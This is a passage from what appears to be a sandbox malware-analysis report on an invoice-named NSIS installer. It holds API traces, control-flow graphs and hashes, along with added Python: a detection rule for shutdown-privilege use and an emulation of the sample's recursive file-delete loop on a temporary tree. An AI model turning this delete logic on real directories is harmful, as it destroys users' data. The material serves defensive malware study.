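    # order, i.e. the binary is able to force a reboot or logoff.
    saw_privilege = False
    for c in calls:
        if c.api == "LookupPrivilegeValueW" and "SeShutdownPrivilege" in c.args:
            saw_privilege = True
        elif saw_privilege and c.api == "ExitWindowsEx":
            findings.append(("shutdown-privilege", c.ref))
            break
    return findings


if __name__ == "__main__":
    for rule, ref in find_findings(parse_api_listing(SAMPLE_LISTING), SAMPLE_PATH):
        print(f"{rule:20s} at 0x{ref:08X}")
```

The return address carried in each `ref` is what ties a hit back to the basic block in the control-flow graph, which is why the rules report it rather than only the API name; feeding the full listing of a report through `parse_api_listing` and then into your own rules is a cheap way to diff two samples of the same packer.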
                                                                                                                                                                                                                      Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe"$.tmp$1033$C:\Users\user\AppData\Local\Admonishment64$C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                      • API String ID: 3441113951-738258447
                                                                                                                                                                                                                      • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                                                                                                                                      • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404DE4
• GetDlgItem.USER32(?,00000408), ref: 00404DEF
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
• LoadBitmapW.USER32(0000006E), ref: 00404E4C
• SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
• SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
• DeleteObject.GDI32(00000000), ref: 00404EC2
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
• SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
• GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
• ShowWindow.USER32(?,00000005), ref: 0040501C
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
• ImageList_Destroy.COMCTL32(?), ref: 004051EC
• GlobalFree.KERNEL32(?), ref: 004051FC
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
• SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
• InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
• ShowWindow.USER32(?,00000000), ref: 0040539B
• GetDlgItem.USER32(?,000003FE), ref: 004053A6
• ShowWindow.USER32(00000000), ref: 004053AD
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 1638840714-813528018
• Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
• Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
• Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
• Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 6F1D121B: GlobalAlloc.KERNELBASE(00000040,?,6F1D123B,?,6F1D12DF,00000019,6F1D11BE,-000000A0), ref: 6F1D1225
• GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6F1D1C6F
• lstrcpyW.KERNEL32(00000008,?), ref: 6F1D1CB7
• lstrcpyW.KERNEL32(00000808,?), ref: 6F1D1CC1
• GlobalFree.KERNEL32(00000000), ref: 6F1D1CD4
• GlobalFree.KERNEL32(?), ref: 6F1D1DB6
• GlobalFree.KERNEL32(?), ref: 6F1D1DBB
• GlobalFree.KERNEL32(?), ref: 6F1D1DC0
• GlobalFree.KERNEL32(00000000), ref: 6F1D1FAA
• lstrcpyW.KERNEL32(?,?), ref: 6F1D2144
• GetModuleHandleW.KERNEL32(00000008), ref: 6F1D21B9
• LoadLibraryW.KERNEL32(00000008), ref: 6F1D21CA
• GetProcAddress.KERNEL32(?,?), ref: 6F1D2224
• lstrlenW.KERNEL32(00000808), ref: 6F1D223E
Memory Dump Source
• Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
• Associated: 00000003.00000002.40207085632.000000006F1D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.40207174922.000000006F1D3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.40207213148.000000006F1D5000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
• String ID:
• API String ID: 245916457-0
• Opcode ID: 166e5d94269be122f6d6b6b4c2b55d08cd266cb7cbbd9b00409d0413915c4e4f
                                                                                                                                                                                                                      • Instruction ID: a6c8a9bcb251d474dc6caaefe2a837c78d66806936d043da4ecf21263864b09c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 166e5d94269be122f6d6b6b4c2b55d08cd266cb7cbbd9b00409d0413915c4e4f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D22DA71D04649DAEB10CFB8C9846EEB7B4FF16395F10462EF0A5F6280D774AAA1CB50
                                                                                                                                                                                                                      Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 724 405afa-405b20 call 405dc5 727 405b22-405b34 DeleteFileW 724->727 728 405b39-405b40 724->728 729 405cb6-405cba 727->729 730 405b42-405b44 728->730 731 405b53-405b63 call 4063e8 728->731 733 405c64-405c69 730->733 734 405b4a-405b4d 730->734 737 405b72-405b73 call 405d09 731->737 738 405b65-405b70 lstrcatW 731->738 733->729 736 405c6b-405c6e 733->736 734->731 734->733 739 405c70-405c76 736->739 740 405c78-405c80 call 40672b 736->740 741 405b78-405b7c 737->741 738->741 739->729 740->729 748 405c82-405c96 call 405cbd call 405ab2 740->748 744 405b88-405b8e lstrcatW 741->744 745 405b7e-405b86 741->745 747 405b93-405baf lstrlenW FindFirstFileW 744->747 745->744 745->747 749 405bb5-405bbd 747->749 750 405c59-405c5d 747->750 764 405c98-405c9b 748->764 765 405cae-405cb1 call 405450 748->765 753 405bdd-405bf1 call 4063e8 749->753 754 405bbf-405bc7 749->754 750->733 752 405c5f 750->752 752->733 766 405bf3-405bfb 753->766 767 405c08-405c13 call 405ab2 753->767 756 405bc9-405bd1 754->756 757 405c3c-405c4c FindNextFileW 754->757 756->753 762 405bd3-405bdb 756->762 757->749 761 405c52-405c53 FindClose 757->761 761->750 762->753 762->757 764->739 768 405c9d-405cac call 405450 call 4061ae 764->768 765->729 766->757 769 405bfd-405c06 call 405afa 766->769 777 405c34-405c37 call 405450 767->777 778 405c15-405c18 767->778 768->729 769->757 777->757 781 405c1a-405c2a call 405450 call 4061ae 778->781 782 405c2c-405c32 778->782 781->757 782->757
APIs
• DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76012EE0,00000000), ref: 00405B23
• lstrcatW.KERNEL32(00425730,\*.*), ref: 00405B6B
• lstrcatW.KERNEL32(?,0040A014), ref: 00405B8E
• lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76012EE0,00000000), ref: 00405B94
• FindFirstFileW.KERNELBASE(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76012EE0,00000000), ref: 00405BA4
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
• FindClose.KERNEL32(00000000), ref: 00405C53
Strings
• "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe", xrefs: 00405AFA
• 0WB, xrefs: 00405B53
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405B08
• \*.*, xrefs: 00405B65
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
• API String ID: 2035342205-1263050090
• Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
• Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
• Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
• Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
Uniqueness

Uniqueness Score: -1.00%
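The API trace and control-flow graph recorded above for the routine at 00405AFA (lstrcatW of "\*.*" onto a directory path, a FindFirstFileW / FindNextFileW / FindClose loop, DeleteFileW, and a call back into 00405AFA from node 405bfd-405c06) have the shape of a recursive directory-delete routine. The Python below is an added example, not code from the sample or from the Joe Sandbox report, that emulates that loop on a constructed temporary tree so the traversal can be run and inspected offline. Assumptions: os.scandir, os.remove and os.rmdir stand in for the Win32 enumeration and deletion calls; the "." and ".." entries are injected because a real "\*.*" enumeration returns them and any such loop must skip them; and the final removal of the directory itself is an assumption, since no RemoveDirectoryW appears in the listed APIs.

```python
"""
Emulation of the recursive delete loop traced at 00405AFA (added example,
not the sample's code). Win32 calls in the trace map to stand-ins here:
  FindFirstFileW/FindNextFileW/FindClose  -> os.scandir
  DeleteFileW                              -> os.remove
  (assumed) directory removal              -> os.rmdir
"""
import os
import tempfile
from typing import List, Optional


def enumerate_entries(directory: str) -> List[str]:
    """Stand-in for enumerating `directory\\*.*` with FindFirstFileW/FindNextFileW.

    A real "\\*.*" enumeration also yields the "." and ".." pseudo-entries;
    they are prepended here so the caller has to filter them exactly as the
    native loop must, otherwise the recursion would never terminate.
    """
    names = [".", ".."]
    with os.scandir(directory) as it:          # FindFirstFileW ... FindClose
        names.extend(entry.name for entry in it)
    return names


def recursive_delete(directory: str, deleted: Optional[List[str]] = None) -> List[str]:
    """Mirror of the 00405AFA loop: delete each file, recurse into each
    subdirectory, then (assumption) remove the now-empty directory.

    Returns every path removed, in removal order, so the caller can check
    exactly what the loop touched instead of relying on printed output.
    """
    if deleted is None:
        deleted = []
    for name in enumerate_entries(directory):
        if name in (".", ".."):                # skip the pseudo-entries
            continue
        path = os.path.join(directory, name)
        if os.path.isdir(path) and not os.path.islink(path):
            recursive_delete(path, deleted)    # the call back into 405afa
        else:
            os.remove(path)                    # DeleteFileW
            deleted.append(path)
    os.rmdir(directory)                        # assumed: directory removed once empty
    deleted.append(directory)
    return deleted


def build_sample_tree(root: str) -> List[str]:
    """Constructed throw-away tree (test data, not from the sample):
    three files at different depths plus one empty subdirectory."""
    layout = {
        "a.txt": "x",
        "sub/b.bin": "y",
        "sub/deeper/c.dat": "z",
        "sub/empty/": None,
    }
    created = []
    for rel, content in layout.items():
        path = os.path.join(root, rel)
        if content is None:
            os.makedirs(path, exist_ok=True)
        else:
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(content)
        created.append(path.rstrip(os.sep))
    return created


def demo() -> int:
    """Build the tree under a temp dir, delete it the way the traced loop
    does, and return the number of filesystem objects removed (3 files +
    4 directories = 7 for the constructed layout)."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "payload")
        build_sample_tree(target)
        removed = recursive_delete(target)
        if os.path.exists(target):
            raise RuntimeError("tree survived the delete loop")
        return len(removed)


if __name__ == "__main__":
    print("objects removed:", demo())
```

The point for an analyst reading the graph: the loop body (nodes 749 through 757) is a single FindNextFileW cycle, the edge 766->769->757 is the recursion into subdirectories rejoining that cycle, and the DeleteFileW at 00405B23 sits on the non-directory branch at the top of the routine. A routine with this shape run against a Temp path, as the strings at 00405B08 show, is worth correlating with the file-system events elsewhere in the report.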

Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
• Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
• Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
• Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76012EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76012EE0), ref: 00406736
• FindClose.KERNEL32(00000000), ref: 00406742
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID: xgB
• API String ID: 2295610775-399326502
• Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
• Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
• Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
• Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 265 404037-40404c 262->265 266 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->266 263->262 264 403eaa-403eb3 263->264 267 403eb5-403ec2 SetWindowPos 264->267 268 403ec8-403ecb 264->268 270 40408c-404091 call 4043ab 265->270 271 40404e-404051 265->271 266->265 267->268 273 403ee5-403eeb 268->273 274 403ecd-403edf ShowWindow 268->274 279 404096-4040b1 270->279 276 404053-40405e call 401389 271->276 277 404084-404086 271->277 280 403f07-403f0a 273->280 281 403eed-403f02 DestroyWindow 273->281 274->273 276->277 298 404060-40407f SendMessageW 276->298 277->270 278 40432c 277->278 286 40432e-404335 278->286 284 4040b3-4040b5 call 40140b 279->284 285 4040ba-4040c0 279->285 289 403f0c-403f18 SetWindowLongW 280->289 290 403f1d-403f23 280->290 287 404309-40430f 281->287 284->285 294 4040c6-4040d1 285->294 295 4042ea-404303 DestroyWindow EndDialog 285->295 287->278 293 404311-404317 287->293 289->286 296 403fc6-403fd4 call 4043c6 290->296 297 403f29-403f3a GetDlgItem 290->297 293->278 300 404319-404322 ShowWindow 293->300 294->295 301 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 294->301 295->287 296->286 302 403f59-403f5c 297->302 303 403f3c-403f53 SendMessageW IsWindowEnabled 297->303 298->286 300->278 331 404126-40412b 301->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 301->332 306 403f61-403f64 302->306 307 403f5e-403f5f 302->307 303->278 303->302 309 403f72-403f77 306->309 310 403f66-403f6c 306->310 308 403f8f-403f94 call 404338 307->308 308->296 312 403fad-403fc0 SendMessageW 309->312 314 403f79-403f7f 309->314 310->312 313 403f6e-403f70 310->313 312->296 313->308 317 403f81-403f87 call 40140b 314->317 
318 403f96-403f9f call 40140b 314->318 327 403f8d 317->327 318->296 328 403fa1-403fab 318->328 327->308 328->327 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->279 351 4041ff-404201 340->351 351->279 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->287 356 404244-404271 CreateDialogParamW 353->356 354->278 355 404219-40421f 354->355 355->279 357 404225 355->357 356->287 358 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->278 358->278 363 4042d0-4042e8 ShowWindow call 4043ab 358->363 363->287
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
• ShowWindow.USER32(?), ref: 00403EDF
• DestroyWindow.USER32 ref: 00403EF3
• SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
• GetDlgItem.USER32(?,?), ref: 00403F30
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
• IsWindowEnabled.USER32(00000000), ref: 00403F4B
• GetDlgItem.USER32(?,00000001), ref: 00403FF9
• GetDlgItem.USER32(?,00000002), ref: 00404003
• SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
• GetDlgItem.USER32(?,00000003), ref: 00404114
• ShowWindow.USER32(00000000,?), ref: 00404135
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
• EnableWindow.USER32(?,?), ref: 00404162
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
• EnableMenuItem.USER32(00000000), ref: 0040417F
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
• lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
• SetWindowTextW.USER32(?,00423728), ref: 004041E8
• ShowWindow.USER32(?,0000000A), ref: 0040431C
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
• String ID: (7B
• API String ID: 3282139019-3251261122
• Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
• Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
• Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
• Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph
• Executed
• Not Executed
                                                                                                                                                                                                                      control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 378 403b5e-403b87 call 403dae call 405dc5 369->378 374 403b53-403b59 lstrcatW 370->374 375 403b3d-403b4e call 4062b6 370->375 374->378 375->374 384 403c19-403c21 call 405dc5 378->384 385 403b8d-403b92 378->385 390 403c23-403c2a call 40640a 384->390 391 403c2f-403c54 LoadImageW 384->391 385->384 386 403b98-403bc0 call 4062b6 385->386 386->384 396 403bc2-403bc6 386->396 390->391 394 403cd5-403cdd call 40140b 391->394 395 403c56-403c86 RegisterClassW 391->395 409 403ce7-403cf2 call 403dae 394->409 410 403cdf-403ce2 394->410 399 403da4 395->399 400 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 395->400 397 403bd8-403be4 lstrlenW 396->397 398 403bc8-403bd5 call 405cea 396->398 404 403be6-403bf4 lstrcmpiW 397->404 405 403c0c-403c14 call 405cbd call 4063e8 397->405 398->397 403 403da6-403dad 399->403 400->394 404->405 408 403bf6-403c00 GetFileAttributesW 404->408 405->384 412 403c02-403c04 408->412 413 403c06-403c07 call 405d09 408->413 419 403cf8-403d12 ShowWindow call 406752 409->419 420 403d7b-403d83 call 405523 409->420 410->403 412->405 412->413 413->405 427 403d14-403d19 call 406752 419->427 428 403d1e-403d30 GetClassInfoW 419->428 425 403d85-403d8b 420->425 426 403d9d-403d9f call 40140b 420->426 425->410 433 403d91-403d98 call 40140b 425->433 426->399 427->428 431 403d32-403d42 GetClassInfoW RegisterClassW 428->431 432 403d48-403d6b DialogBoxParamW call 40140b 428->432 431->432 436 403d70-403d79 call 403a28 432->436 433->410 436->403
APIs
  • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
  • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
• lstrcatW.KERNEL32(1033,00423728), ref: 00403B59
• lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Admonishment64,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
• lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Admonishment64,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
• GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Admonishment64), ref: 00403C40
  • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
